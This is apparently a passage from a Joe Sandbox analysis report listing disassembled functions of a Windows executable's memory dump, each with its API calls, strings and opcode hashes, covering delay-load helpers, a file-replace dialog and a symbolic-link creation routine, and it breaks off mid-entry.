Opcode Fuzzy Hash: 0c6a826b6c0a15e0fd4cbd0024c1fa4ca9d1eb0d70ba0ba6e174bffaad13990c
Instruction Fuzzy Hash: 9EA0029516E142BC715875536D16D3A425CD4C9B51330851AF426D4185554C5D455471

Function 007EDAF2 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 007EDAB2

Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 416f86dcabefc99b05faa17136819500fa07143e50c1759454b0e6456ecc7423
Instruction ID: 38bdcbee7cfec3144f5ee66f20f1db662538cb5c58a14078dacce8dce6c3c67e
Opcode Fuzzy Hash: 416f86dcabefc99b05faa17136819500fa07143e50c1759454b0e6456ecc7423
Instruction Fuzzy Hash: 9EA0029516E142BC715875536D16D3A425CD4C9B51330851AF426D4185554C5D455471

Function 007EDAE8 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 007EDAB2

Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 8180d1e1a8b2e1cc4aa42afafa891bc1124f5326899eabf39d0542ccd73543aa
Instruction ID: 38bdcbee7cfec3144f5ee66f20f1db662538cb5c58a14078dacce8dce6c3c67e
Opcode Fuzzy Hash: 8180d1e1a8b2e1cc4aa42afafa891bc1124f5326899eabf39d0542ccd73543aa
Instruction Fuzzy Hash: 9EA0029516E142BC715875536D16D3A425CD4C9B51330851AF426D4185554C5D455471

Function 007EDACA Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 007EDAB2

Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 7314435d17ab17b02bb62296d8f589e4704c322790c3ed7d53e3e639ef3b2dc6
Instruction ID: 38bdcbee7cfec3144f5ee66f20f1db662538cb5c58a14078dacce8dce6c3c67e
Opcode Fuzzy Hash: 7314435d17ab17b02bb62296d8f589e4704c322790c3ed7d53e3e639ef3b2dc6
Instruction Fuzzy Hash: 9EA0029516E142BC715875536D16D3A425CD4C9B51330851AF426D4185554C5D455471

Function 007EDAC0 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 007EDAB2

Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 207bd5b26bdd9df7ba90a1fba9cdefbe98c26a729953186922fab063598d9a3f
Instruction ID: 38bdcbee7cfec3144f5ee66f20f1db662538cb5c58a14078dacce8dce6c3c67e
Opcode Fuzzy Hash: 207bd5b26bdd9df7ba90a1fba9cdefbe98c26a729953186922fab063598d9a3f
Instruction Fuzzy Hash: 9EA0029516E142BC715875536D16D3A425CD4C9B51330851AF426D4185554C5D455471

Function 007EDAA5 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 007EDAB2

Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 42cd2240d71bae4c7d98c96e8b4a1fc55e01ccd88363538d6654d2d440ccfe45
Instruction ID: e03b86cbb504b163cb8d4511b5de9d491f070c356b980664e0e3f0c24e5c78fa
Opcode Fuzzy Hash: 42cd2240d71bae4c7d98c96e8b4a1fc55e01ccd88363538d6654d2d440ccfe45
Instruction Fuzzy Hash: 91A0129126E0417C3058B103AC06C3A020CD0C4B11330811AF426D0184544C0D040430

Function 007EDBF7 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 007EDBD5

Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: fa28cde91e88cd307c6ad3a34c807ac378978038c9d7ab74a14d115b04f84674
Instruction ID: cccbba2fbee19523821954606256a989bbaad01ba15c0ecc54eff7cf03852a67
Opcode Fuzzy Hash: fa28cde91e88cd307c6ad3a34c807ac378978038c9d7ab74a14d115b04f84674
Instruction Fuzzy Hash: A3A002D627E146BC715851526D1BD76021CD4C8B613315519B516D41C16A585D455431

Function 007EDC4E Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 007EDC36

Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: dadb937219916bc1d3e5d21d7fa51c6a2d396a0a855ec119f2a8041773ddc361
Instruction ID: fa24951a9b4b354147c67fb74aec9b929b94bd46ae4666a4b334078811ee299f
Opcode Fuzzy Hash: dadb937219916bc1d3e5d21d7fa51c6a2d396a0a855ec119f2a8041773ddc361
Instruction Fuzzy Hash: 2FA0029556E542BC715C61526D16D7A021CD4C8B913304919B516D51E165886D455431

Function 007EDC44 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 007EDC36

Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 5d3c55b96889eb444bfed2b968885ef95332c0a40c9bc79a3a539b6fd361a3d5
Instruction ID: fa24951a9b4b354147c67fb74aec9b929b94bd46ae4666a4b334078811ee299f
Opcode Fuzzy Hash: 5d3c55b96889eb444bfed2b968885ef95332c0a40c9bc79a3a539b6fd361a3d5
Instruction Fuzzy Hash: 2FA0029556E542BC715C61526D16D7A021CD4C8B913304919B516D51E165886D455431

Function 007EDC1F Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 007EDBD5

Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: f04bdc5753f7194f1b1b63d738d5dd938bcc076351859d20bebf3736ed76f18b
Instruction ID: cccbba2fbee19523821954606256a989bbaad01ba15c0ecc54eff7cf03852a67
Opcode Fuzzy Hash: f04bdc5753f7194f1b1b63d738d5dd938bcc076351859d20bebf3736ed76f18b
Instruction Fuzzy Hash: A3A002D627E146BC715851526D1BD76021CD4C8B613315519B516D41C16A585D455431

Function 007EDC15 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 007EDBD5

Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: b5ca027b925a0d614f431fa2f0b97bca9aa2e5eb8ce4742d0aee5092b1ddd5b8
Instruction ID: cccbba2fbee19523821954606256a989bbaad01ba15c0ecc54eff7cf03852a67
Opcode Fuzzy Hash: b5ca027b925a0d614f431fa2f0b97bca9aa2e5eb8ce4742d0aee5092b1ddd5b8
Instruction Fuzzy Hash: A3A002D627E146BC715851526D1BD76021CD4C8B613315519B516D41C16A585D455431

Function 007EDC0B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 007EDBD5

Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 4fd46c6b951373a66a25dac6d47a17bb49fcfed1270b70bbd84aebd0356c2d9f
Instruction ID: cccbba2fbee19523821954606256a989bbaad01ba15c0ecc54eff7cf03852a67
Opcode Fuzzy Hash: 4fd46c6b951373a66a25dac6d47a17bb49fcfed1270b70bbd84aebd0356c2d9f
Instruction Fuzzy Hash: A3A002D627E146BC715851526D1BD76021CD4C8B613315519B516D41C16A585D455431

Function 007EA322 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetCurrentDirectoryW.KERNELBASE(?,007EA587,C:\Users\user\Desktop,00000000,0081946A,00000006), ref: 007EA326

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: CurrentDirectory
String ID:
API String ID: 1611563598-0
Opcode ID: 783798438ce70992c56e6a77dc07935356841710f97f8f5271169dc59d45d5a1
Instruction ID: e869fe9227bd6450d92bd79c9cb6343b861e759be87af56ba5686608b3c45581
Opcode Fuzzy Hash: 783798438ce70992c56e6a77dc07935356841710f97f8f5271169dc59d45d5a1
Instruction Fuzzy Hash: 7EA0123019400656CB000B30CC0AC1576546760702F0086207002C00A0CB30C814A500

Function 007D96D0 Relevance: 1.3, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(000000FF,?,?,007D968F,?,?,?,?,00801FA1,000000FF), ref: 007D96EB

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: dc5fa207aa6eaf4d40442ab67e87cadeedd7d9e8cad7d46cbd30f61dd5e8fdfe
Instruction ID: eafcca482a80ddb0ce25affcee1679e6bec07f27bb1f302bbbb5db8e08d7a762
Opcode Fuzzy Hash: dc5fa207aa6eaf4d40442ab67e87cadeedd7d9e8cad7d46cbd30f61dd5e8fdfe
Instruction Fuzzy Hash: C2F05E30556B048FDB308E24D949792B7F8AB12735F049B1F92E7536E0E769A88D8F10

Non-executed Functions

Function 007EB8E0 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 286timewindowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 007D130B: GetDlgItem.USER32(00000000,00003021), ref: 007D134F
Part of subcall function 007D130B: SetWindowTextW.USER32(00000000,008035B4), ref: 007D1365

SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 007EB971
EndDialog.USER32(?,00000006), ref: 007EB984
GetDlgItem.USER32(?,0000006C), ref: 007EB9A0
SetFocus.USER32(00000000), ref: 007EB9A7
SetDlgItemTextW.USER32(?,00000065,?), ref: 007EB9E1
SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 007EBA18
FindFirstFileW.KERNEL32(?,?), ref: 007EBA2E
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 007EBA4C
FileTimeToSystemTime.KERNEL32(?,?), ref: 007EBA5C
GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 007EBA78
GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 007EBA94
_swprintf.LIBCMT ref: 007EBAC4

Part of subcall function 007D400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 007D401D

SetDlgItemTextW.USER32(?,0000006A,?), ref: 007EBAD7
FindClose.KERNEL32(00000000), ref: 007EBADE
_swprintf.LIBCMT ref: 007EBB37
SetDlgItemTextW.USER32(?,00000068,?), ref: 007EBB4A
SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 007EBB67
FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 007EBB87
FileTimeToSystemTime.KERNEL32(?,?), ref: 007EBB97
GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 007EBBB1
GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 007EBBC9
_swprintf.LIBCMT ref: 007EBBF5
SetDlgItemTextW.USER32(?,0000006B,?), ref: 007EBC08
_swprintf.LIBCMT ref: 007EBC5C
SetDlgItemTextW.USER32(?,00000069,?), ref: 007EBC6F

Part of subcall function 007EA63C: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 007EA662
Part of subcall function 007EA63C: GetNumberFormatW.KERNEL32(00000400,00000000,?,0080E600,?,?), ref: 007EA6B1

Strings

REPLACEFILEDLG, xrefs: 007EB907
%s %s, xrefs: 007EBB29, 007EBC4E
%s %s %s, xrefs: 007EBAB2, 007EBBE7

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
String ID: %s %s$%s %s %s$REPLACEFILEDLG
API String ID: 797121971-1840816070
Opcode ID: b8a4b5d38ee2b382e894a69e631d90f9903cfd43e8dbd71e1e2430779bf046bf
Instruction ID: d8f8dbf3309a1ec7e5eab4a8dd87abdc3465fcdaf8afe5c0f4bd5678c3100fea
Opcode Fuzzy Hash: b8a4b5d38ee2b382e894a69e631d90f9903cfd43e8dbd71e1e2430779bf046bf
Instruction Fuzzy Hash: 709185B2249348FBD7219BA1DD49FFB7BACFB8D700F040819B745D2191DB79AA048762

Function 007D718C Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 296fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 007D7191
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,00000001), ref: 007D72F1
CloseHandle.KERNEL32(00000000), ref: 007D7301

Part of subcall function 007D7BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 007D7C04
Part of subcall function 007D7BF5: GetLastError.KERNEL32 ref: 007D7C4A
Part of subcall function 007D7BF5: CloseHandle.KERNEL32(?), ref: 007D7C59

CreateDirectoryW.KERNEL32(?,00000000,?,00000001), ref: 007D730C
CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 007D741A
DeviceIoControl.KERNEL32(00000000,000900A4,?,-00000008,00000000,00000000,?,00000000), ref: 007D7446
CloseHandle.KERNEL32(?), ref: 007D7457
GetLastError.KERNEL32 ref: 007D7467
RemoveDirectoryW.KERNEL32(?), ref: 007D74B3
DeleteFileW.KERNEL32(?), ref: 007D74DB

Strings

SeRestorePrivilege, xrefs: 007D71B2
UNC\, xrefs: 007D723C
SeCreateSymbolicLinkPrivilege, xrefs: 007D71BC
\??\, xrefs: 007D7217

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: CloseCreateFileHandle$DirectoryErrorLast$ControlCurrentDeleteDeviceH_prologProcessRemove
String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
API String ID: 3935142422-3508440684
Opcode ID: 76f28d0882689f0750afa5dfd8826a03fd054af4b89f962885e9d19434956a43
Instruction ID: 72fbe7695bf8098c0a8ea4c56c5a01a835b4c24e946a5c4b8c997c36e0b44b86
Opcode Fuzzy Hash: 76f28d0882689f0750afa5dfd8826a03fd054af4b89f962885e9d19434956a43
Instruction Fuzzy Hash: A6B1E371904259EBDF25DFA4DC45BEE7B78BF04300F04446AFA49E7242E738AA49CB61

Function 007F866F Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

